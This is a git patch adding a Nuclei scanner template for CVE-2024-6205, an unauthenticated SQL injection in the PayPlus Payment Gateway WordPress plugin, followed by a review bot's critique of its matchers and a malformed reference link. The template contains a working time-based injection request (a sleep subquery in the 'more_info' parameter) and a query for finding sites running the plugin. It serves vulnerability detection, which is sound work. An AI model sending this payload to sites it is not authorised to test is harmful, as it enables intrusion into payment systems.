From 1157e107966aad2c763f411fa6fce655669cd101 Mon Sep 17 00:00:00 2001
From: Kazgangap
Date: Fri, 19 Jul 2024 21:36:26 +0300
Subject: [PATCH] add CVE-2024-6205
---
http/cves/2024/CVE-2024-6205.yaml | 50 +++++++++++++++++++++++++++++++
1 file changed, 50 insertions(+)
create mode 100644 http/cves/2024/CVE-2024-6205.yaml
diff --git a/http/cves/2024/CVE-2024-6205.yaml b/http/cves/2024/CVE-2024-6205.yaml
new file mode 100644
index 0000000000..53a20adcd6
--- /dev/null
+++ b/http/cves/2024/CVE-2024-6205.yaml
@@ -0,0 +1,50 @@
+id: CVE-2024-6205
+
+info:
+ name: PayPlus Payment Gateway < 6.6.9 - SQL Injection
+ author: securityforeveryone
+ severity: critical
+ description: |
+ The PayPlus Payment Gateway WordPress plugin before 6.6.9 does not properly sanitise and escape a parameter before using it in a SQL statement via a WooCommerce API route available to unauthenticated users, leading to an SQL injection vulnerability.
+ remediation: Fixed in 6.6.9
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-6205
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-6205
+ - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/payplus-payment-gateway/payplus-payment-gateway-668-unauthenticated-sql-injection
+ - https://wpscan.com/vulnerability/7e2c5032-2917-418c-aee3-092bdb78a087/
+ - https://github.com/20142995/nuclei-templates
+ classification:
+ epss-score: 0.00043
+ epss-percentile: 0.09301
+ metadata:
+ max-request: 1
+ vendor: PayPlus LTD
+ product: PayPlus Payment Gateway
+ framework: wordpress
+ publicwww-query: "/wp-content/plugins/payplus-payment-gateway"
+ tags: wpscan,cve,cve2024,sqli,wordpress,wp-plugin
+
+http:
+ - raw:
+ - |
+ @timeout 20s
+ GET /?wc-api=payplus_gateway&status_code=true&more_info=(select*from(select(sleep(6)))a) HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code == 302'
+ condition: and
+
+ - type: word
+ part: body
+ words:
+ - '-1'
+
+ - type: word
+ part: content_type
+ words:
+ - 'text/html'
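Review bot: The `duration>=6` condition in the `dsl` matcher is the only check tied to the injected delay, and it is measured on a single request, so network latency or a slow host can satisfy it; the other matchers (302, a body containing the substring `-1`, `text/html`) appear to describe the route's ordinary response rather than the flaw. Sending a baseline request without the delay first, and requiring the delayed response to exceed that baseline by the sleep interval, would make the finding far less sensitive to latency. In the `reference` list the MITRE link drops the identifier prefix and should read `https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6205`. The `classification` block carries only EPSS values; adding `cve-id: CVE-2024-6205` and `cwe-id: CWE-89` would let triage and reporting tooling key on the result.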